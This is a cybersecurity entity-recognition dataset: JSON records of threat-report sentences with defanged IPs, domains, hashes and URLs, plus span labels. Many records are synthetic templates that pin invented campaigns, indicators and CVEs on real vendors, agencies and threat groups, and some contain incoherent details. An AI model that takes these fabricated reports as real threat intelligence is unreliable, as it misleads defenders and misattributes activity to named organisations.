{"text": "Forensic examination of the compromised host identified Ryuk artifacts. The primary payload was located at C:\\Windows\\System32\\config\\SAM with SHA256 hash fad5464ca78bf7ea789d0b75d495dd68e0be607fddb3fef461889a996900649b. A secondary implant was found at /tmp/.hidden/beacon (MD5: f2405ea9ed106751b3fab66afe53efbc). Network logs showed outbound connections to 51[.]238[.]93[.]225 and DNS queries to code-deploy[[ . ]]store.", "spans": {"Malware: Ryuk": [[56, 60]], "Indicator: fad5464ca78bf7ea789d0b75d495dd68e0be607fddb3fef461889a996900649b": [[155, 219]], "Indicator: f2405ea9ed106751b3fab66afe53efbc": [[280, 312]], "Indicator: 51.238.93.225": [[359, 378]], "Indicator: code-deploy[.]store": [[398, 421]]}, "info": {"id": "synth_00021", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnexthop: Forbid FDB status change while nexthop is in a group\n\nThe kernel forbids the creation of non-FDB nexthop groups with FDB\nnexthops:\n\n # ip nexthop add id 1 via 192 [ . ] 0 [ . ] 2 [ . ] 1 fdb\n # ip nexthop add id 2 group 1\n Error: Non FDB nexthop group cannot have fdb nexthops.\n\nAnd vice versa:\n\n # ip nexthop add id 3 via 192[.]0[.]2[.]2 dev dummy1\n # ip nexthop add id 4 group 3 fdb\n Error: FDB nexthop group can only have fdb nexthops.\n\nHowever, as long as no routes are pointing to a non-FDB nexthop group,\nthe kernel allows changing the type of a nexthop from FDB to non-FDB and\nvice versa:\n\n # ip nexthop add id 5 via 192 [ . ] 0 [ . ] 2 [ . ] 2 dev dummy1\n # ip nexthop add id 6 group 5\n # ip nexthop replace id 5 via 192 [ . ] 0 [ . ] 2 [ . ] 2 fdb\n # echo $?\n 0\n\nThis configuration is invalid and can result in a NPD [1] since FDB\nnexthops are not associated with a nexthop device:\n\n # ip route add 198 [ . ] 51 [ . ] 100 [ . ] 1/32 nhid 6\n # ping 198[.]51[.]100[.]1\n\nFix by preventing nexthop FDB status change while the nexthop is in a\ngroup:\n\n # ip nexthop add id 7 via 192 [ . ] 0 [ . ] 2 [ . ] 2 dev dummy1\n # ip nexthop add id 8 group 7\n # ip nexthop replace id 7 via 192[.]0[.]2[.]2 fdb\n Error: Cannot change nexthop FDB status while in a group.\n\n[1]\nBUG: kernel NULL pointer dereference, address: 00000000000003c0\n[...]\nOops: Oops: 0000 [#1] SMP\nCPU: 6 UID: 0 PID: 367 Comm: ping Not tainted 6.17.0-rc6-virtme-gb65678cacc03 #1 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc41 04/01/2014\nRIP: 0010:fib_lookup_good_nhc+0x1e/0x80\n[...]\nCall Trace:\n <TASK>\n fib_table_lookup+0x541/0x650\n ip_route_output_key_hash_rcu+0x2ea/0x970\n ip_route_output_key_hash+0x55/0x80\n __ip4_datagram_connect+0x250/0x330\n udp_connect+0x2b/0x60\n __sys_connect+0x9c/0xd0\n __x64_sys_connect+0x18/0x20\n do_syscall_64+0xa4/0x2a0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53", "spans": {"Indicator: 192.0.2.1": [[237, 264]], "Indicator: 192.0.2.2": [[401, 416], [702, 729], [803, 830], [1160, 1187], [1261, 1276]], "Indicator: 198.51.100.1": [[986, 1016], [1035, 1053]], "System: Linux kernel": [[7, 19]], "System: QEMU": [[1556, 1560]], "Vulnerability: NULL pointer dereference": [[1357, 1381]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-39980"}}
{"text": "Symantec published a threat intelligence report linking Lazarus Group to a new campaign exploiting CVE-2022-45142 in Apache Struts. The attackers deployed Dridex via Ligolo, establishing C2 communication with 10[.]84[.]141[.]29 and backup-gateway[.]top. A secondary payload was downloaded from hxxp://proxy-mail[.]site/assets/js/payload.js. The malware binary (SHA1: 64cc478ff183fbab60d87027b717505acbe5e1bd) was dropped to C:\\Windows\\Temp\\agent.py. Phishing emails were sent from billing@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 172[.]77[.]104[.]134.", "spans": {"Organization: Symantec": [[0, 8]], "Vulnerability: CVE-2022-45142": [[99, 113]], "System: Apache Struts": [[117, 130]], "Malware: Dridex": [[155, 161]], "Indicator: 10.84.141.29": [[209, 227]], "Indicator: backup-gateway.top": [[232, 252]], "Indicator: http://proxy-mail.site/assets/js/payload.js": [[294, 339]], "Indicator: 64cc478ff183fbab60d87027b717505acbe5e1bd": [[367, 407]], "Indicator: billing@secure-verify.net": [[481, 510]], "Indicator: 172.77.104.134": [[576, 596]]}, "info": {"id": "synth_v2_00234", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: ShadowPad (MD5: 919bfc3c41e1402c36e73f1d0c4f3666). Upon execution on SonicWall SMA, the sample creates C:\\Users\\admin\\AppData\\Local\\Temp\\ntds.dit and injects into legitimate processes. Network analysis shows beaconing to 62[.]90[.]236[.]129 every 60 seconds and DNS queries to static-storage[.]live. The second stage was fetched from hxxps://data-relay[ . ]club/login and written to /dev/shm/lsass.dmp. The payload uses Impacket-style techniques for defense evasion. A secondary hash (SHA256: d730ce66b507164e8fd30ccbd579f134dae1ad2e34d8a0837d387a1cab78a2d6) was extracted from the unpacked payload.", "spans": {"Malware: ShadowPad": [[25, 34]], "Indicator: 919bfc3c41e1402c36e73f1d0c4f3666": [[41, 73]], "System: SonicWall SMA": [[94, 107]], "Indicator: 62.90.236.129": [[246, 265]], "Indicator: static-storage.live": [[302, 323]], "Indicator: hxxps://data-relay.club/login": [[359, 392]], "Indicator: d730ce66b507164e8fd30ccbd579f134dae1ad2e34d8a0837d387a1cab78a2d6": [[518, 582]]}, "info": {"id": "synth_v2_00472", "source": "defanged_augment"}}
{"text": "Once the user double-clicks on the executable file , the dropper drops a Word document in %AppData% and displays the following decoy document to the victim , while the dropper runs in the background and installs the backdoor . %appdata%\\info[ . ]docx :", "spans": {"Indicator: %appdata%\\info.docx": [[227, 250]]}, "info": {"id": "cyberner_stix_train_007073", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Sophos X-Ops identified a large-scale phishing operation. Emails originated from account@identity-verify[ . ]cc and ceo@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://storage-login[ . ]org/assets/js/payload.js which hosted a credential harvesting page on gatewayproxy[.]com. A secondary link hxxp://auth-backup[.]link/login delivered Ryuk (SHA256: 829548717eac38897bea47900c502c63545b0780a21815bb08ca3232e56a72d5). The malware was saved to /usr/local/bin/winlogon.exe and established C2 with 10 [ . ] 48 [ . ] 205 [ . ] 109.", "spans": {"Organization: Sophos X-Ops": [[26, 38]], "Indicator: account@identity-verify.cc": [[107, 137]], "Indicator: ceo@auth-check.org": [[142, 164]], "Indicator: https://storage-login.org/assets/js/payload.js": [[221, 271]], "Indicator: gatewayproxy.com": [[317, 335]], "Indicator: hxxp://auth-backup.link/login": [[354, 385]], "Malware: Ryuk": [[396, 400]], "Indicator: 829548717eac38897bea47900c502c63545b0780a21815bb08ca3232e56a72d5": [[410, 474]], "Indicator: 10.48.205.109": [[554, 585]]}, "info": {"id": "synth_v2_01039", "source": "defanged_augment"}}
{"text": "Unfortunately , there is a specific feature of Android vulnerabilities that means it is only possible to get rid of them by receiving an update from the device manufacturers . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups . It then creates a service named clr_optimization_v4.0.30229_32 , which is responsible for executing CLR[.]exe . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": {"Indicator: CLR.exe": [[378, 387]]}, "info": {"id": "cyberner_stix_train_007031", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: Vidar (SHA1: 71a3aaaab8e01e071e82ee30a4e6deaddb5776fb). Upon execution on SonicWall SMA, the sample creates C:\\ProgramData\\chrome_helper.exe and injects into legitimate processes. Network analysis shows beaconing to 111 [ . ] 120 [ . ] 146 [ . ] 63 every 60 seconds and DNS queries to storage-secure[.]cc. The second stage was fetched from hxxps://cacheportal[.]live/api/v2/auth and written to C:\\Windows\\Temp\\payload.bin. The payload uses Certutil-style techniques for defense evasion. A secondary hash (SHA256: 9f4045ba031c3d49fa1b5f6d2beacc1312b6b5afe71ae0eb19e37b07466ad321) was extracted from the unpacked payload.", "spans": {"Malware: Vidar": [[25, 30]], "Indicator: 71a3aaaab8e01e071e82ee30a4e6deaddb5776fb": [[38, 78]], "System: SonicWall SMA": [[99, 112]], "Indicator: 111.120.146.63": [[241, 273]], "Indicator: storage-secure.cc": [[310, 329]], "Indicator: hxxps://cacheportal.live/api/v2/auth": [[365, 403]], "Indicator: 9f4045ba031c3d49fa1b5f6d2beacc1312b6b5afe71ae0eb19e37b07466ad321": [[538, 602]]}, "info": {"id": "synth_v2_00610", "source": "defanged_augment"}}
{"text": "Tenable detected a multi-stage attack chain. The initial phishing email from finance@secure-verify[.]net contained a link to hxxps://cloud-cdn[ . ]io/portal/verify. This redirected to hxxp://cloudcloud[ . ]info/login on storagesync[.]online. A secondary email from contact@login-portal[ . ]tech pointed to hxxps://staticedge[ . ]org/gate.php which delivered LockBit. The final payload callback was hxxp://update-update[.]org/gate.php resolving to 172[.]41[.]53[.]121 via cloudstatic[.]site.", "spans": {"Organization: Tenable": [[0, 7]], "Indicator: finance@secure-verify.net": [[77, 104]], "Indicator: hxxps://cloud-cdn.io/portal/verify": [[125, 163]], "Indicator: hxxp://cloudcloud.info/login": [[184, 216]], "Indicator: storagesync.online": [[220, 240]], "Indicator: contact@login-portal.tech": [[265, 294]], "Indicator: hxxps://staticedge.org/gate.php": [[306, 341]], "Malware: LockBit": [[358, 365]], "Indicator: http://update-update.org/gate.php": [[398, 433]], "Indicator: 172.41.53.121": [[447, 466]], "Indicator: cloudstatic.site": [[471, 489]]}, "info": {"id": "synth_v2_01754", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Trojan/W32.Cobalt.196608 Trojan.Conbea Win.Tool.CobaltStrike-6336852-0 HackTool.Win32.Cobalt.k Trojan.Win32.Cobalt.egtrej BackDoor.Meterpreter.42 BehavesLike[.]Win32[.]Backdoor[.]ch HackTool.CobaltStrike HackTool/Win32.Cobalt Trojan.Application.HackTool.CobaltStrike.1 HackTool.Win32.Cobalt.k HackTool/Win32.Cobalt.R197271 TrojanDownloader.Agresbeak RiskWare.HackTool Riskware.HackTool!t96XHdFe7u4 W32/CobaltStrike_Beacon.A!tr Win32/Application.Hacktool.e79", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Backdoor.ch": [[190, 225]]}, "info": {"id": "cyner2_train_002631", "source": "defanged_augment"}}
{"text": "Microsoft MSRC published a threat intelligence report linking FIN7 to a new campaign exploiting CVE-2021-48618 in Progress Telerik. The attackers deployed Lumma Stealer via BloodHound, establishing C2 communication with 200 [ . ] 80 [ . ] 8 [ . ] 226 and cache-backup[.]site. A secondary payload was downloaded from hxxps://logincloud[ . ]org/panel/index.html. The malware binary (MD5: 8045a876307c5034a9207efb379a2ca0) was dropped to C:\\Program Files\\Common Files\\helper.sh. Phishing emails were sent from security@document-share[.]link targeting enterprise users. A backup C2 server was identified at 21 [ . ] 3 [ . ] 3 [ . ] 46.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Vulnerability: CVE-2021-48618": [[96, 110]], "System: Progress Telerik": [[114, 130]], "Malware: Lumma Stealer": [[155, 168]], "Indicator: 200.80.8.226": [[220, 250]], "Indicator: cache-backup.site": [[255, 274]], "Indicator: https://logincloud.org/panel/index.html": [[316, 359]], "Indicator: 8045a876307c5034a9207efb379a2ca0": [[386, 418]], "Indicator: security@document-share.link": [[507, 537]], "Indicator: 21.3.3.46": [[603, 630]]}, "info": {"id": "synth_v2_00225", "source": "defanged_augment"}}
{"text": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of CentOS Web Panel cwp-e17.0[.]9[.]8[.]923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the check_ip parameter, the process does not properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9707.", "spans": {"Indicator: 0.9.8.923": [[123, 138]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-15421"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 192[.]164[.]108[.]74, the Volexity IR team identified QakBot running as C:\\Windows\\Temp\\dropper.ps1. The threat actor, believed to be Turla, used BloodHound for credential harvesting and Mimikatz for lateral movement. Exfiltrated data was sent to proxymail[.]tech and authauth[.]top. The initial dropper (MD5: 540b9e174e9d8993d8f938f7eeae785d) was delivered via a phishing email from it@document-share[.]link. A second C2 node was observed at 72[.]51[.]220[.]48, with a persistence mechanism writing to C:\\Windows\\System32\\winlogon.exe.", "spans": {"Indicator: 192.164.108.74": [[64, 84]], "Organization: Volexity": [[90, 98]], "Malware: QakBot": [[118, 124]], "Indicator: proxymail.tech": [[311, 327]], "Indicator: authauth.top": [[332, 346]], "Indicator: 540b9e174e9d8993d8f938f7eeae785d": [[374, 406]], "Indicator: it@document-share.link": [[448, 472]], "Indicator: 72.51.220.48": [[507, 525]]}, "info": {"id": "synth_v2_00352", "source": "defanged_augment"}}
{"text": "NSA detected a multi-stage attack chain. The initial phishing email from confirm@credential-check[ . ]site contained a link to hxxps://cloud-proxy[ . ]net/admin/config. This redirected to hxxp://nodeportal[ . ]com/callback on cachecloud[.]online. A secondary email from it@phishing-domain[ . ]com pointed to hxxp://logincloud[.]site/assets/js/payload.js which delivered Qbot. The final payload callback was hxxps://storagenode[ . ]io/assets/js/payload.js resolving to 172[.]235[.]33[.]18 via sync-relay[.]top.", "spans": {"Organization: NSA": [[0, 3]], "Indicator: confirm@credential-check.site": [[73, 106]], "Indicator: https://cloud-proxy.net/admin/config": [[127, 167]], "Indicator: hxxp://nodeportal.com/callback": [[188, 222]], "Indicator: cachecloud.online": [[226, 245]], "Indicator: it@phishing-domain.com": [[270, 296]], "Indicator: hxxp://logincloud.site/assets/js/payload.js": [[308, 353]], "Malware: Qbot": [[370, 374]], "Indicator: https://storagenode.io/assets/js/payload.js": [[407, 454]], "Indicator: 172.235.33.18": [[468, 487]], "Indicator: sync-relay.top": [[492, 508]]}, "info": {"id": "synth_v2_01833", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Volexity identified a large-scale phishing operation. Emails originated from confirm@phishing-domain[ . ]com and service@mail-service[ . ]info, spoofing legitimate services. Victims were directed to hxxp://loginupdate[ . ]com/download/update.exe which hosted a credential harvesting page on portalportal[.]info. A secondary link hxxp://relaynode[ . ]online/secure/token delivered Vidar (MD5: e8b7a5d23d9dde6be874d9428d3ff8b4). The malware was saved to C:\\Users\\Public\\Documents\\implant.so and established C2 with 186[.]66[.]111[.]76.", "spans": {"Organization: Volexity": [[26, 34]], "Indicator: confirm@phishing-domain.com": [[103, 134]], "Indicator: service@mail-service.info": [[139, 168]], "Indicator: http://loginupdate.com/download/update.exe": [[225, 271]], "Indicator: portalportal.info": [[317, 336]], "Indicator: hxxp://relaynode.online/secure/token": [[355, 395]], "Malware: Vidar": [[406, 411]], "Indicator: e8b7a5d23d9dde6be874d9428d3ff8b4": [[418, 450]], "Indicator: 186.66.111.76": [[539, 558]]}, "info": {"id": "synth_v2_00868", "source": "defanged_augment"}}
{"text": "Moreover , BusyGasper boasts some keylogging tools – the malware processes every user tap , gathering its coordinates and calculating characters by matching given values with hardcoded ones . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language . The email contained a malicious link to hxxp://mynetwork[ . ]ddns[ . ]net:880 . UNC1878 has used various offensive security tools , most commonly Cobalt Strike BEACON , along with legitimate tools and built - in commands such as PSEXEC , WMI , and BITSadmin .", "spans": {"Malware: BusyGasper": [[11, 21]], "Indicator: http://mynetwork.ddns.net:880": [[373, 410]]}, "info": {"id": "cyberner_stix_train_003020", "source": "defanged_augment"}}
{"text": "Artifact Analysis for Royal campaign:\nStage 1 dropper at /dev/shm/winlogon.exe - MD5: 044bd431ea8e7afd6fb8d8d4fb7085b4\nStage 2 loader at /usr/local/bin/loader.exe - SHA1: 7c3cce49d758619b8e05a053713c5f3954d5a393\nFinal payload at /var/tmp/implant.so - SHA1: 507860f7aa59b4bcb03f053b3bd74e02e6599155\nExfiltration module - SHA1: 5fd8043623225118dddf98e0abc5ba2b6aff3438\nAll stages communicated with 124 [ . ] 67 [ . ] 225 [ . ] 189. PowerShell Empire signatures detected in Stage 2.", "spans": {"Malware: Royal": [[22, 27]], "Indicator: 044bd431ea8e7afd6fb8d8d4fb7085b4": [[86, 118]], "Indicator: 7c3cce49d758619b8e05a053713c5f3954d5a393": [[171, 211]], "Indicator: 507860f7aa59b4bcb03f053b3bd74e02e6599155": [[257, 297]], "Indicator: 5fd8043623225118dddf98e0abc5ba2b6aff3438": [[326, 366]], "Indicator: 124.67.225.189": [[396, 428]]}, "info": {"id": "synth_v2_01929", "source": "defanged_augment"}}
{"text": "A backdoor also known as: BackDoor-FHS.dr Trojan/Witthy.a Trojan.Win32.Clicker.crbxjx Trojan.Click2.48783 BehavesLike[ . ]Win32[ . ]VirRansom[ . ]cc Trojan.Win32.Merlos TR/Rogue.7786243 Trj/CI.A Win32/Witthy.A W32/Witthy.A!tr.bdr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.VirRansom.cc": [[106, 148]]}, "info": {"id": "cyner2_train_002219", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 118[.]252[.]57[.]217, the ESET Research IR team identified PlugX running as C:\\Windows\\Temp\\loader.exe. The threat actor, believed to be BlackTech, used WinPEAS for credential harvesting and Certutil for lateral movement. Exfiltrated data was sent to securesecure[ . ]club and cachecache[.]xyz. The initial dropper (SHA256: 911f1f3bb80cb6acbf96dfc6a58de249764f2d3c1e7ea95278d2722fac119f9c) was delivered via a phishing email from verify@secure-verify[ . ]net. A second C2 node was observed at 10[.]178[.]47[.]53, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\ntds.dit.", "spans": {"Indicator: 118.252.57.217": [[64, 84]], "Organization: ESET Research": [[90, 103]], "Malware: PlugX": [[123, 128]], "Indicator: securesecure.club": [[315, 336]], "Indicator: cachecache.xyz": [[341, 357]], "Indicator: 911f1f3bb80cb6acbf96dfc6a58de249764f2d3c1e7ea95278d2722fac119f9c": [[388, 452]], "Indicator: verify@secure-verify.net": [[494, 522]], "Indicator: 10.178.47.53": [[557, 575]]}, "info": {"id": "synth_v2_00267", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan/W32.Morkus.73728 Trojan.Gambee.BB3 Trojan.Kazy.D13FF6 Trojan.Win32.Morkus.bcz Win32.Trojan.Morkus.Tayq TrojWare.Win32.TrojanClicker.VB.IDP Trojan.DownLoader5.64540 BehavesLike[ . ]Win32[ . ]Trojan[ . ]lt TR/VB.Click.idpmnua Win32.Troj.Undef.kcloud TrojanDownloader:Win32/Gambee.A Trojan.Win32.Morkus.bcz Trojan/Win32.OnlineGameHack.R30007 Win32/TrojanClicker.VB.NYI Trojan-Clicker.Win32.VB W32/VBClicker.NY!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.lt": [[197, 236]]}, "info": {"id": "cyner2_train_002277", "source": "defanged_augment"}}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader[.]dll and a file named readme[.]txt to the filesystem and then executes the legitimate executable .", "spans": {"Malware: malware": [[4, 11]], "Malware: self-extracting RAR": [[174, 193]], "Indicator: Loader.dll": [[255, 267]], "Indicator: readme.txt": [[285, 297]]}, "info": {"id": "cyberner_stix_train_001085", "source": "defanged_augment"}}
{"text": "Malware Analysis Report: AsyncRAT (MD5: 7afce390a5777656fc861f345bdd152e). Upon execution on Citrix NetScaler, the sample creates C:\\Windows\\System32\\payload.bin and injects into legitimate processes. Network analysis shows beaconing to 10[.]87[.]21[.]177 every 60 seconds and DNS queries to gatewayrelay[.]dev. The second stage was fetched from hxxp://storageportal[.]online/gate.php and written to C:\\Users\\admin\\Desktop\\ntds.dit. The payload uses Mimikatz-style techniques for defense evasion. A secondary hash (MD5: 7e81320c73b3c036163e6afc0f81b499) was extracted from the unpacked payload.", "spans": {"Malware: AsyncRAT": [[25, 33]], "Indicator: 7afce390a5777656fc861f345bdd152e": [[40, 72]], "System: Citrix NetScaler": [[93, 109]], "Indicator: 10.87.21.177": [[237, 255]], "Indicator: gatewayrelay.dev": [[292, 310]], "Indicator: http://storageportal.online/gate.php": [[346, 384]], "Indicator: 7e81320c73b3c036163e6afc0f81b499": [[520, 552]]}, "info": {"id": "synth_v2_00551", "source": "defanged_augment"}}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . There was code to download a decoy document from the Internet and open it in a second winword[.]exe process using the Start-Process cmdlet .", "spans": {"Vulnerability: EternalBlue": [[218, 229]], "Indicator: winword.exe": [[355, 368]], "Indicator: Start-Process": [[387, 400]], "Indicator: cmdlet": [[401, 407]]}, "info": {"id": "cyberner_stix_train_003477", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2026-27486 is a critical SQL injection affecting Atlassian Confluence. Google TAG confirmed active exploitation by Turla in the wild. Exploitation delivers Conti (MD5: 03a91c32e8529fbc7cb403943bad4879) which is dropped to /var/tmp/svchost.exe. The exploit payload is hosted at hxxps://cacheportal[.]site/gate.php and communicates to 153[.]73[.]165[.]202 for C2.", "spans": {"Vulnerability: CVE-2026-27486": [[24, 38]], "Vulnerability: SQL injection": [[53, 66]], "System: Atlassian Confluence": [[77, 97]], "Organization: Google TAG": [[99, 109]], "Malware: Conti": [[184, 189]], "Indicator: 03a91c32e8529fbc7cb403943bad4879": [[196, 228]], "Indicator: https://cacheportal.site/gate.php": [[305, 340]], "Indicator: 153.73.165.202": [[361, 381]]}, "info": {"id": "synth_v2_00822", "source": "defanged_augment"}}
{"text": "Blog Post by SentinelOne: Tracking Turla's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-27219 against Barracuda ESG deployments. The initial access vector involves spear-phishing emails from service@login-portal[ . ]tech delivering Meduza Stealer. Post-compromise, the attackers deploy RedLine Stealer and use BloodHound for reconnaissance. C2 infrastructure includes 205 [ . ] 136 [ . ] 148 [ . ] 24 and cloud-storage[ . ]dev. A staging server at hxxp://securestorage[.]io/collect hosts additional tooling. Key artifact: /opt/app/bin/ntds.dit (SHA256: 62f46c0faa720a9f297447d48fbc1dff5f4f4d726763d38ffd9f7fdf6d2ff6f6).", "spans": {"Organization: SentinelOne": [[13, 24]], "Vulnerability: CVE-2025-27219": [[120, 134]], "System: Barracuda ESG": [[143, 156]], "Indicator: service@login-portal.tech": [[232, 261]], "Malware: Meduza Stealer": [[273, 287]], "Malware: RedLine Stealer": [[327, 342]], "Indicator: 205.136.148.24": [[409, 441]], "Indicator: cloud-storage.dev": [[446, 467]], "Indicator: http://securestorage.io/collect": [[489, 522]], "Indicator: 62f46c0faa720a9f297447d48fbc1dff5f4f4d726763d38ffd9f7fdf6d2ff6f6": [[594, 658]]}, "info": {"id": "synth_v2_01502", "source": "defanged_augment"}}
{"text": "### SentinelOne \n:small_orange_diamond: 2024 - [[SentinelOne] WatchTower 2023 Intelligence-Driven Threat Hunting](hxxps://www[.]sentinelone[.]com/resources/watchtower-end-of-year-report-2023/) | :closed_book:\n\n### Red Canary \n:small_orange_diamond: 2021 - [[Red_Canary] 2021 Threat Detection Report](hxxps://redcanary[.]com/threat-detection-report/) | :closed_book:\n\n### NSA\n:small_orange_diamond: Jan 08 2021 - [[NSA] 2020 Cybersecurity Year in Review report](hxxps://media[ . ]defense[ . ]gov/2021/Jan/08/2002561651/-1/-1/0/NSA%20CYBERSECURITY%202020%20YEAR%20IN%20REVIEW.PDF/NSA%20CYBERSECURITY%202020%20YEAR%20IN%20REVIEW.PDF) | :closed_book:\n\n### Objective-See\n:small_orange_diamond: Jan 01 2024 - [[Objective-See] The Mac Malware of 2023](hxxps://objective-see[.]org/downloads/MacMalware_2023.pdf) | :closed_book:\n:small_orange_diamond: Jan 01 2023 - [[Objective-See] The Mac Malware of 2022](hxxps://objective-see[ . ]org/downloads/MacMalware_2022.pdf) | :closed_book:\n:small_orange_diamond: Jan 01 2022 - [[Objective-See] The Mac Malware of 2021](hxxps://objective-see[.]com/downloads/MacMalware_2021.pdf) | :closed_book:\n:small_orange_diamond: Jan 04 2021 - [[Objective-See] The Mac Malware of 2020](hxxps://objective-see[ . ]com/downloads/MacMalware_2020.pdf/) | :closed_book:\n### ESET\n:small_orange_diamond: Q3 2023 - [[ESET] 2023 Q2-Q3 APT Activity Report](hxxps://web-assets[ . ]esetstatic[ . ]com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf) | :closed_book:\n:small_orange_diamond: Jun 2022 - [[ESET] ESET Threat Report T1 2022](hxxps://www[ . ]welivesecurity[ . ]com/wp-content/uploads/2022/06/eset_threat_report_t12022.pdf) | :closed_book:\n:small_orange_diamond: Feb 09 2022 - [[ESET] ESET Threat Report T3 2021](hxxps://www[.]welivesecurity[.]com/2022/02/09/eset-threat-report-t32021/) | :closed_book:\n:small_orange_diamond: Sep 30 2021 - [[ESET] ESET Threat Report T2 2021](hxxps://www[ . ]welivesecurity[ . ]com/2021/09/30/eset-threat-report-t22021/) | :closed_book:\n:small_orange_diamond: Jun 03 2021 - [[ESET] ESET Threat Report T1 2021](hxxps://www[.]welivesecurity[.]com/2021/06/03/eset-threat-report-t12021/) | :closed_book:\n:small_orange_diamond: Oct 18 2020 - [", "spans": {"Indicator: https://www.sentinelone.com/resources/watchtower-end-of-year-report-2023/": [[114, 191]], "Indicator: https://redcanary.com/threat-detection-report/": [[300, 348]], "Indicator: https://media.defense.gov/2021/Jan/08/2002561651/-1/-1/0/NSA%20CYBERSECURITY%202020%20YEAR%20IN%20REVIEW.PDF/NSA%20CYBERSECURITY%202020%20YEAR%20IN%20REVIEW.PDF": [[461, 629]], "Indicator: https://objective-see.org/downloads/MacMalware_2023.pdf": [[745, 802]], "Indicator: https://objective-see.org/downloads/MacMalware_2022.pdf": [[899, 958]], "Indicator: https://objective-see.com/downloads/MacMalware_2021.pdf": [[1055, 1112]], "Indicator: https://objective-see.com/downloads/MacMalware_2020.pdf/": [[1209, 1269]], "Indicator: https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf": [[1369, 1484]], "Indicator: https://www.welivesecurity.com/wp-content/uploads/2022/06/eset_threat_report_t12022.pdf": [[1572, 1667]], "Indicator: https://www.welivesecurity.com/2022/02/09/eset-threat-report-t32021/": [[1758, 1830]], "Indicator: https://www.welivesecurity.com/2021/09/30/eset-threat-report-t22021/": [[1921, 1997]], "Indicator: https://www.welivesecurity.com/2021/06/03/eset-threat-report-t12021/": [[2088, 2160]], "Malware: Report": [[292, 298]], "Organization: NSA": [[371, 374]], "Organization: Red Canary": [[214, 224]], "Organization: ESET": [[1291, 1295]], "Organization: SentinelOne": [[4, 15]]}, "info": {"source": "defanged_augment", "name": "Report"}}
{"text": "Blog Post by FBI: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-20016 against MOVEit Transfer deployments. The initial access vector involves spear-phishing emails from notification@phishing-domain[.]com delivering PikaBot. Post-compromise, the attackers deploy NjRAT and use PsExec for reconnaissance. C2 infrastructure includes 10[.]147[.]87[.]80 and data-proxy[.]net. A staging server at hxxp://dataupdate[.]live/assets/js/payload.js hosts additional tooling. Key artifact: /etc/cron.d/loader.exe (SHA256: 2f19f8492457076d00340766316fd4ddacf8fe7136b1136c73f39eb00b0f9314).", "spans": {"Organization: FBI": [[13, 16]], "Vulnerability: CVE-2025-20016": [[119, 133]], "System: MOVEit Transfer": [[142, 157]], "Indicator: notification@phishing-domain.com": [[233, 267]], "Malware: PikaBot": [[279, 286]], "Malware: NjRAT": [[326, 331]], "Indicator: 10.147.87.80": [[394, 412]], "Indicator: data-proxy.net": [[417, 433]], "Indicator: http://dataupdate.live/assets/js/payload.js": [[455, 500]], "Indicator: 2f19f8492457076d00340766316fd4ddacf8fe7136b1136c73f39eb00b0f9314": [[573, 637]]}, "info": {"id": "synth_v2_01550", "source": "defanged_augment"}}
{"text": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: hxxps://github[ . ]com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", "spans": {"Vulnerability: CVE-2025-13465": [[133, 147]], "Indicator: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg": [[149, 225]], "Vulnerability: prototype pollution": [[63, 82]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-2950"}}
